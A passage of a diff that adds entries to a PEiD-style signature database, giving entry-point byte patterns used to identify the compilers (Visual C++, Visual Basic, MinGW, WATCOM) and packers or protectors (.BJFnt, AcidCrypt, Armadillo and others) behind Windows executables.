+signature = 55 8B EC 83 EC 44 56 FF 15 ?? ?? ?? ?? 6A 01 8B F0 FF 15
+ep_only = true
+
+[Microsoft Visual C++ v6.0]
+signature = 55 8B EC 6A FF 68 68 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 53 56 57
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 51 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? 8B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4D ?? ?? ?? ?? 02
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = 83 7C 24 08 01 75 09 8B 44 24 04 A3 ?? ?? 00 10 E8 8B FF FF FF
+ep_only = true
+
+[Microsoft Visual C++ v6.0]
+signature = 55 8B EC 83 EC 50 53 56 57 BE ?? ?? ?? ?? 8D 7D F4 A5 A5 66 A5 8B
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = 55 8D 6C ?? ?? 81 EC ?? ?? ?? ?? 8B 45 ?? 83 F8 01 56 0F 84 ?? ?? ?? ?? 85 C0 0F 84
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C
+ep_only = true
+
+[Microsoft Visual C++ v6.0]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 0D ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 1C ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00
+ep_only = true
+
+[Microsoft Visual C++ v6.0 (Debug Version)]
+signature = 55 8B EC 51 ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[Microsoft Visual C++ v7.0]
+signature = 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 89 65 ?? 8B F4 89 3E 56 FF 15 ?? ?? ?? ?? 8B 4E ?? 89 0D ?? ?? ?? ?? 8B 46 ?? A3
+ep_only = true
+
+[Microsoft Visual C++ v7.0 DLL]
+signature = 55 8D 6C ?? ?? 81 EC ?? ?? ?? ?? 8B 45 ?? 83 F8 01 56 0F 84 ?? ?? ?? ?? 85 C0 0F 84
+ep_only = true
+
+[Microsoft Visual C++ v7.0 DLL]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 6A 0C 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 40 89 45 E4
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 83 7C 24 08 01 75 ?? ?? ?? 24 04 50 A3 ?? ?? ?? 50 FF 15 00 10 ?? 50 33 C0 40 C2 0C 00
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 C4 E4 53 56 57 89 65 E8 C7 45 E4 01 00 00 00 C7 45 FC
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10 75 09 83 3D ?? ?? 40 00 00 EB 26 83 FE 01 74 05 83 FE 02 75 22 A1
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL (Debug)]
+signature = 55 8B EC ?? ?? 0C 83 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 8B
+ep_only = true
+
+[Microsoft Visual C++ v7.1 EXE]
+signature = 6A ?? 68 ?? ?? ?? 01 E8 ?? ?? 00 00 66 81 3D 00 00 00 01 4D 5A 75 ?? A1 3C 00 00 01 ?? ?? 00 00 00 01
+ep_only = true
+
+[Microsoft Visual C++ v7.1 EXE]
+signature = 6A ?? 68 ?? ?? ?? ?? E8
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 53 55 56 8B 74 24 14 85 F6 57 B8 01 00 00 00
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 53 56 57 BB 01 ?? ?? ?? 8B ?? 24 14
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 53 B8 01 00 00 00 8B 5C 24 0C 56 57 85 DB 55 75 12 83 3D ?? ?? ?? ?? ?? 75 09 33 C0
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 55 8B EC 56 57 BF 01 00 00 00 8B 75 0C
+ep_only = true
+
+[Microsoft Visual C++]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00
+ep_only = true
+
+[Microsoft Visual Basic v5.0]
+signature = ?? ?? ?? ?? ?? ?? ?? FF FF FF 00 00 00 00 00 00 30 00 00 00 40 00 00 00 00 00 00
+ep_only = true
+
+[Microsoft Visual Basic v5.0/v6.0]
+signature = 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 00 00 00 00 00 00 30 00 00 00
+ep_only = true
+
+[Microsoft Visual Basic v6.0 DLL]
+signature = 5A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E9 ?? ?? FF
+ep_only = true
+
+[MinGW GCC v2.x]
+signature = 55 89 E5 E8 ?? ?? ?? ?? C9 C3 ?? ?? 45 58 45
+ep_only = true
+
+[MinGW GCC v2.x]
+signature = 55 89 E5 ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[MinGW GCC v2.x]
+signature = 55 89 E5 E8 ?? ?? ?? ?? C9 C3 ?? ?? 45 58 45
+ep_only = true
+
+[MinGW GCC DLL v2xx]
+signature = 55 89 E5 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 68
+ep_only = true
+
+[MinGW v3.2.x (Dll_main)]
+signature = 55 89 E5 83 EC 18 89 75 FC 8B 75 0C 89 5D F8 83 FE 01 74 5C 89 74 24 04 8B 55 10 89 54 24 08 8B 55 08 89 14 24 E8 96 01 00 00 83 EC 0C 83 FE 01 89 C3 74 2C 85 F6 75 0C 8B 0D 00 30 00 10 85 C9 75 10 31 DB 89 D8 8B 5D F8 8B 75 FC 89 EC 5D C2 0C 00 E8 59 00 00 00 EB EB 8D B4 26 00 00 00 00 85 C0 75 D0 E8 47 00 00 00 EB C9 90 8D 74 26 00 C7 04 24 80 00 00 00 E8 F4 05 00 00 A3 00 30 00 10 85 C0 74 1A C7 00 00 00 00 00 A3 10 30 00 10 E8 3B 02 00 00 E8 C6 01 00 00 E9 75 FF FF FF E8 BC 05 00 00 C7 00 0C 00 00 00 31 C0 EB 98 89 F6 55 89 E5 83 EC 08 89 5D FC 8B 15 00 30 00 10 85 D2 74 29 8B 1D 10 30 00 10 83 EB 04 39 D3 72 0D 8B 03 85 C0 75 2A 83 EB 04 39 D3 73 F3 89 14 24 E8 6B 05 00 00 31 C0 A3 00 30 00 10 C7 04 24 00 00 00 00 E8 48 05 00 00 8B 5D FC 89 EC 5D C3
+ep_only = true
+
+[MinGW v3.2.x (Dll_WinMain)]
+signature = 55 89 E5 83 EC 18 89 75 FC 8B 75 0C 89 5D F8 83 FE 01 74 5C 89 74 24 04 8B 55 10 89 54 24 08 8B 55 08 89 14 24 E8 76 01 00 00 83 EC 0C 83 FE 01 89 C3 74 2C 85 F6 75 0C 8B 0D 00 30 00 10 85 C9 75 10 31 DB 89 D8 8B 5D F8 8B 75 FC 89 EC 5D C2 0C 00 E8 59 00 00 00 EB EB 8D B4 26 00 00 00 00 85 C0 75 D0 E8 47 00 00 00 EB C9 90 8D 74 26 00 C7 04 24 80 00 00 00 E8 A4 05 00 00 A3 00 30 00 10 85 C0 74 1A C7 00 00 00 00 00 A3 10 30 00 10 E8 1B 02 00 00 E8 A6 01 00 00 E9 75 FF FF FF E8 6C 05 00 00 C7 00 0C 00 00 00 31 C0 EB 98 89 F6 55 89 E5 83 EC 08 89 5D FC 8B 15 00 30 00 10 85 D2 74 29 8B 1D 10 30 00 10 83 EB 04 39 D3 72 0D 8B 03 85 C0 75 2A 83 EB 04 39 D3 73 F3 89 14 24 E8 1B 05 00 00 31 C0 A3 00 30 00 10 C7 04 24 00 00 00 00 E8 F8 04 00 00 8B 5D FC 89 EC 5D C3
+ep_only = true
+
+[MinGW v3.2.x (main)]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 E4 40 40 00 E8 68 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 E4 40 40 00 E8 48 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 00 41 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 F4 40 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 53 83 EC 24 C7 04 24 A0 11 40 00 E8 8D 07 00 00 83 EC 04 E8 85 02 00 00 C7 04 24 00 20 40 00 8B 15 10 20 40 00 8D 4D F8 C7 45 F8 00 00 00 00 89 4C 24 10 89 54 24 0C 8D 55 F4 89 54 24 08 C7 44 24 04 04 20 40 00 E8 02 07 00 00 A1 20 20 40 00 85 C0 74 76 A3 30 20 40 00 A1 F0 40 40 00 85 C0 74 1F 89 04 24 E8 C3 06 00 00 8B 1D 20 20 40 00 89 04 24 89 5C 24 04 E8 C1 06 00 00
+ep_only = true
+
+[MinGW v3.2.x (WinMain)]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 FC 40 40 00 E8 68 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 FC 40 40 00 E8 48 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 18 41 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 0C 41 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 53 83 EC 24 C7 04 24 A0 11 40 00 E8 5D 08 00 00 83 EC 04 E8 55 03 00 00 C7 04 24 00 20 40 00 8B 15 10 20 40 00 8D 4D F8 C7 45 F8 00 00 00 00 89 4C 24 10 89 54 24 0C 8D 55 F4 89 54 24 08 C7 44 24 04 04 20 40 00 E8 D2 07 00 00 A1 20 20 40 00 85 C0 74 76 A3 30 20 40 00 A1 08 41 40 00 85 C0 74 1F 89 04 24 E8 93 07 00 00 8B 1D 20 20 40 00 89 04 24 89 5C 24 04 E8 91 07 00 00
+ep_only = true
+
+[MinGW v3.2.x (Dll_mainCRTStartup)]
+signature = 55 89 E5 83 EC 08 6A 00 6A 00 6A 00 6A 00 E8 0D 00 00 00 B8 00 00 00 00 C9 C3 90 90 90 90 90 90 FF 25 38 20 00 10 90 90 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 00
+ep_only = true
+
+[MinGW v3.2.x (_mainCRTStartup)]
+signature = 55 89 E5 83 EC 08 6A 00 6A 00 6A 00 6A 00 E8 0D 00 00 00 B8 00 00 00 00 C9 C3 90 90 90 90 90 90 FF 25 38 20 40 00 90 90 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 00
+ep_only = true
+
+[Stranik 1.3 Modula/C/Pascal]
+signature = E8 ?? ?? FF FF E8 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? ?? 00 ?? ?? 00 ?? 00 ?? 00 00 ?? 00 ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? 00 ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[WATCOM C/C++ 32 Run-Time System 1988-1995]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? 57 41 54 43 4F 4D 20 43 2F 43 2B 2B 33 32 20 52 75 6E 2D 54
+ep_only = true
+
+[WATCOM C/C++ 32 Run-Time System 1988-1994]
+signature = FB 83 ?? ?? 89 E3 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 66 ?? ?? ?? 66 ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 29 C0 B4 30 CD 21
+ep_only = true
+
+[WATCOM C/C++]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? 57 41
+ep_only = true
+
+[WATCOM C/C++ DLL]
+signature = 53 56 57 55 8B 74 24 14 8B 7C 24 18 8B 6C 24 1C 83 FF 03 0F 87
+ep_only = true
+
+[.BJFnt v1.1b]
+signature = EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56
+ep_only = true
+
+[.BJFnt v1.2 RC]
+signature = EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB
+ep_only = true
+
+[.BJFnt v1.3]
+signature = EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60
+ep_only = true
+
+[.BJFnt v1.3]
+signature = EB ?? 3A ?? ?? 1E EB ?? CD 20 9C EB ?? CD 20 EB ?? CD 20 60 EB
+ep_only = true
+
+[32Lite v0.03a]
+signature = 60 06 FC 1E 07 BE ?? ?? ?? ?? 6A 04 68 ?? 10 ?? ?? 68
+ep_only = true
+
+[AcidCrypt]
+signature = 60 B9 ?? ?? ?? 00 BA ?? ?? ?? 00 BE ?? ?? ?? 00 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB
+ep_only = true
+
+[AcidCrypt]
+signature = BE ?? ?? ?? ?? 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB
+ep_only = true
+
+[Alloy v1.x.2000]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 46 23 40 ?? 0B
+ep_only = true
+
+[Armadillo v1.60a]
+signature = 55 8B EC 6A FF 68 98 71 40 00 68 48 2D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.71]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1
+ep_only = true
+
+[Armadillo v1.72 - v1.73]
+signature = 55 8B EC 6A FF 68 E8 C1 ?? ?? 68 F4 86 ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58
+ep_only = true
+
+[Armadillo v1.77]
+signature = 55 8B EC 6A FF 68 B0 71 40 00 68 6C 37 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.80]
+signature = 55 8B EC 6A FF 68 E8 C1 00 00 68 F4 86 00 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.82]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 74 81 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.83]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 64 84 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.84]
+signature = 55 8B EC 6A FF 68 E8 C1 40 00 68 F4 86 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90]
+signature = 55 8B EC 6A FF 68 10 F2 40 00 68 64 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.9x]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v1.90b1]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 04 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b2]
+signature = 55 8B EC 6A FF 68 F0 C1 40 00 68 A4 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b3]
+signature = 55 8B EC 6A FF 68 08 E2 40 00 68 94 95 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b4]
+signature = 55 8B EC 6A FF 68 08 E2 40 00 68 B4 96 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90a]
+signature = 55 8B EC 64 FF 68 10 F2 40 00 68 14 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90c]
+signature = 55 8B EC 6A FF 68 10 F2 40 00 68 74 9D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.xx - v2.xx]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6
+ep_only = true
+
+[Armadillo v2.00]
+signature = 55 8B EC 6A FF 68 00 02 41 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.00b1]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.00b2-2.00b3]
+signature = 55 8B EC 6A FF 68 00 F2 40 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.01]
+signature = 55 8B EC 6A FF 68 08 02 41 00 68 04 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.10b2]
+signature = 55 8B EC 6A FF 68 18 12 41 00 68 24 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.20]
+signature = 55 8B EC 6A FF 68 10 12 41 00 68 F4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.20b1]
+signature = 55 8B EC 6A FF 68 30 12 41 00 68 A4 A5 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.50]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0
+ep_only = true
+
+[Armadillo v2.50b1]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.50b3]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0
+ep_only = true
+
+[Armadillo v2.51]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20
+ep_only = true
+
+[Armadillo v2.52 beta2]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? B0 ?? ?? ?? ?? 68 60 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 24
+ep_only = true
+
+[Armadillo v2.52]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? E0 ?? ?? ?? ?? 68 D4 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 38
+ep_only = true
+
+[Armadillo v2.52]
+signature = 55 8B EC 6A FF 68 E0 ?? ?? ?? 68 D4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 38
+ep_only = true
+
+[Armadillo v2.52b2]
+signature = 55 8B EC 6A FF 68 B0 ?? ?? ?? 68 60 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 24
+ep_only = true
+
+[Armadillo v2.53]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 40 ?? ?? ?? ?? 68 54 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 58 33 D2 8A D4 89
+ep_only = true
+
+[Armadillo v2.53]
+signature = 55 8B EC 6A FF 68 40 ?? ?? ?? 68 54 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC
+ep_only = true
+
+[Armadillo v2.53b3]
+signature = 55 8B EC 6A FF 68 D8 ?? ?? ?? 68 14 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.xx (CopyMem II)]
+signature = 6A ?? 8B B5 ?? ?? ?? ?? C1 E6 04 8B 85 ?? ?? ?? ?? 25 07 ?? ?? 80 79 05 48 83 C8 F8 40 33 C9 8A 88 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 81 E2 07 ?? ?? 80 79 05 4A 83 CA F8 42 33 C0 8A 82
+ep_only = true
+
+[Armadillo v2.5x - v2.6x]
